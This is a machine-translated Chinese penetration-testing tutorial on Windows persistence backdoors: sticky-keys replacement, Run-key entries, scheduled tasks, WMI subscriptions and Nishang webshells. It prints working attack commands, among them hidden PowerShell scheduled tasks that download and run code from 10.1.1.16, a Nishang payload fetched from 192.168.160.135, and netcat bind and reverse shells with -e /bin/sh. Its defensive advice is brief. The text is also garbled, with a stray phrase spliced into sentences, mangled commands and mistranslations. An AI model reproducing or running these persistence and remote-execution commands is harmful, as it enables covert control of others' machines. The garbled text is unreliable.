关闭粘滞键 内网渗透基石篇——权限维持分析

前言

专注是做事成功的关键，是健康心态的特征。 当你与你关注的事物融为一体时，你就不会让自己被焦虑所困扰。 专注和放松是同一枚硬币的两个方面。 一个人只有全神贯注，才能给一件事带来乐趣。 一旦你专注于它，它就会立即活跃起来。

后门，原意指开在建筑物后面的门关闭粘滞键，通常比较隐蔽。 在信息安全领域。 后门是一种通过绕过安全控制来访问程序或系统的方法。 简单来说，后门就是留在目标主机上的一段软件，可以让攻击者随时连接到目标主机。 在大多数连接下，后门是一个运行在目标主机上的隐藏进程。 由于后门可能允许未经授权的普通用户控制计算机，因此攻击者通常使用后门来控制服务器。

一、操作系统后门分析与防范

操作系统后门一般是指通过绕过目标系统安全控制系统的正式用户认证过程来维持对目标系统的控制，隐藏控制行为的方法。 系统维护人员可以清除操作系统中的后门，恢复目标系统安全控制系统普通用户的认证过程。

1. StickyKeys后门

粘滞键后门是一种比较常见的持久控制方法。

在 Windows 主机上，连续按 5 次“shift”键调出粘滞键。 Windows 的粘滞键主要是为不能同时按下多个键的用户设计的。 例如，在使用组合键“ctrl+p”时，用户需要同时按下“ctrl”+“p”这两个键。 如果使用粘滞键实现组合键“ctrl+p”的功能，用户只需要A键即可。

将windowssystem32目录下的粘滞键可执行文件sethc.exe替换为可执行文件serhc.exe.bak。 这个功能在Empire下也可以轻松实现。

输入“usemodulateral_movemnet /invoke_wmi_debuggerinfo”命令使用模板，输入info命令查看具体参数配置。

set Listener testxset ComputerName WIN7-64.admin.testxset TargetBinary sethc.exe

实验一：

第 1 步：设置管理员拥有

这个实验非常简单，只需要很少的设置。 首先找到sethc.exe文件，然后点击Properties，选择Owner，Edit，选择当前所有者为Administrator。

第 2 步：检查所有

让 Administrator 拥有完全控制权限，以便可以更名或删除。 建议改名字关闭粘滞键，实验完再改回来。

第三步：复制cmd.exe

复制一个cmd.exe文件，重命名为sethc.exe，就大功告成了。

第 4 步：测试并查看

您可以随时随地连续点击“shift”5次，将弹出cmd.exe命令行窗口。

2.注意事项

对于粘滞键后门，可以采取以下防范措施

1、远程登录服务器时，连续按“shift”键5次判断服务器是否被入侵

2 注册表注入后门

在正常用户权限下，攻击者会将需要执行的后门程序或脚本的路径填入注册表项HKCU:SoftwareMicrosoftWindowsCurrentVersionRun（键名可以任意设置）。 当管理员登录系统后，后门运行，服务器反弹成功。

实验室环境：

服务器：卡莉

客户端：Win7

建议：关闭杀毒软件，关闭防火墙，否则实验可能无法成功

第一步：进入模块

输入此代理（交互 testx）

进入模块（usemodule persistence/userland/registry）

第二步：配置环境

接下来配置（set Name testx）

接下来配置（设置RegPath HKCU:SoftwareMicrosoftWindowsCurrentVersionRun）

第 3 步：重新启动计算机

第 4 步：测试并查看

注册表注入后门预防措施

杀毒软件对这类后门有专门的查杀机制，当系统发现后门时会弹出提示框。 根据提示内容采取相应措施删除此类后门程序。

3.定时任务后门

计划任务在Windows 7及更早的操作系统中使用at命令调用，在Windows 8以上的操作系统中使用schtasks命令调用。计划任务的后门分为管理员权限和普通用户权限两种。 管理员权限的后门可以设置更多的定时任务。

schtasks /Create /tn Updater /tr notepad.exe /sc hourly /mo 1

使用 schtasks /delete /tn updater 删除。

1.在metsaploit中模拟定时任务后门

使用 Metasploit 的 powershell Payload Delivery 模板，您可以模拟攻击者的行为，在目标系统中快速建立会话。 安全软件不会检测到此行为，因为它没有写入磁盘。

2.在目标系统中输入生成的后门代码，生成新的session

3.目标机访问URL获取session

4. 获得许可。

（1）用户登录
schtasks /create /tn WindowsUpdate /tr "c:windowssystem32powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring("http://10.1.1.16:8080/EYoBVHcTfv"))'" /sc onlogon /ru System
(2)系统启动schtasks /create /tn WindowsUpdate /tr "c:windowssystem32powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring("http://10.1.1.16:8080/EYoBVHcTfv"))'" /sc onstart /ru System
(3)系统空闲schtasks /create /tn WindowsUpdate /tr "c:windowssystem32powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring("http://10.1.1.16:8080/EYoBVHcTfv"))'" /sc onidle /i 1

2.在powersploit中模拟定时任务后门

使用PowerSploit渗透测试框架PowerShell版本的Persistence模块，可以模拟生成自动创建定时任务的后门脚本。 上传到目标后，导入脚本

Import-Module .Persistence.psm1

使用以下命令通过定时任务创建后门。后门会在电脑空闲时执行，执行成功后会生成名为Persistence.ps1的脚本

$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdleAdd-Persistence -FilePath ./shuteer.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose

Shutter.ps1是定时任务要执行的payload，可以如下执行生成文件

3.在Empire中模拟定时任务后门

usemodule persistence/elevated/schtasks

set DailyTime 10.30set Listener testexecute

4.WMi型后门

WMI 类型的后门只能由具有管理员权限的用户运行。 WMI类型的后门通常使用PowerShell进行扫描，可以直接从新的WMI属性中读取并执行后门代码，赋予代码能力。 这样，攻击者就可以在系统中安装持久化后门，而不会在系统中留下任何文件。 WMI类型后来使用了WMI的两个特性，即无文件和无进程。 其基本原理是：将代码存放在WMI中，实现需要的“无文件”； 当满足设定的条件时，系统会自动启动PowerShell进程来清除后门程序。 执行后，进程会消失（持续时间根据后门的运行情况而定，一般为几秒）。 Empire下的Invoke-WMI模块可以实现该后门的利用。

WMI类后门主要利用了WMI的两个特点，即无文件和无进程。 基本原理是：将代码加密存储在WMI中，实现无文件； 当满足设定的条件时，系统会自动启动PowerShell进程执行后门程序。 执行后进程会消失，实现没有进程。

您可以使用 Empire 的 Invoke-WMI 模块。 启用该模块后，目标主机上已经存在WMI后门。 当目标主机重启时，后门就会被触发。

实验：

1.首先开始提权

2.配置环境

进入模块（usemodule persistence/elevated/wmi）

基本不用配置，直接运行（和execute一样）

得到以下提示，基本上就成功了一半

3.验证环境

进入目标机器并验证wmi

直接在powershell中输入以下命令

结果中可以看到CommandLineTemlate中的内容包含了powershell.exe

Get-WMIObject -Namespace rootSubscription -Class CommandLineEventConsumer -Filter “Name=’Updater’”

4.重启目标机器

2、Web后门分析与防范

Web后门，俗称webshel​​l，是asp、asp.NEt、php、jsp程序的网页代码。 这些代码都在服务器上运行。 攻击者会使用一段精心设计的代码对服务器进行一些危险的操作，以获取一些敏感的技术信息，或者通过渗透、提权等方式获得对服务器的控制权。 IDS、防病毒软件和安全工具通常会检测攻击者设置的 Web 后门。

1.NIShang下的webshel​​l

Nishang是一款PowerShell渗透测试工具，集成了框架、脚本（包括下载和执行、键盘记录、DNS、延迟命令等）和各种Paylaods，广泛应用于渗透测试的各个阶段。

ASPX Malaysia也存在于尼尚。 该模块位于nishangAntak-WebShell 目录中。 使用此模块，您可以编写代码、执行脚本、上传/下载文件等。

基本流程：

Forward shell：客户端想要得到服务端的shell

先打壳是前向壳，再连接

首先监控并播放 shell (nc -lvp 23333 -e /bin/sh)

后连接（nc 192.168.160.140 23333）

——

反向shell：服务端想要获取客户端的shell

弹壳后是反壳，先听

先听 (nc -lvp 23333)

客户端上线后（nc 192.168.160.140 23333 -e /bin/sh）

实验室环境：

服务器：windows7 (testx@192.168.160.135)

客户端：windows7 (testx@192.168.160.139)

Import-Module .nishang.psm1

生成负载

Invoke-PoshRatHttp -IPAddress 192.168.160.135 -Port 10101

powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.160.135:10101/connect'))

Nishang的webshel​​l（Antak）

把尼尚的antak.aspx文件放到ISS网站上

然后访问网站中的antak.aspx文件（出现登陆页面）

Nishang的antak用户名： 免责声明

Nishang的antak密码：ForLegitUseOnly

这个人是个小偷。 全网查不到密码。 我别无选择，只能看看这个 apsx 文件。

在评论里找到用户名和密码，真的需要黑客思维才能破局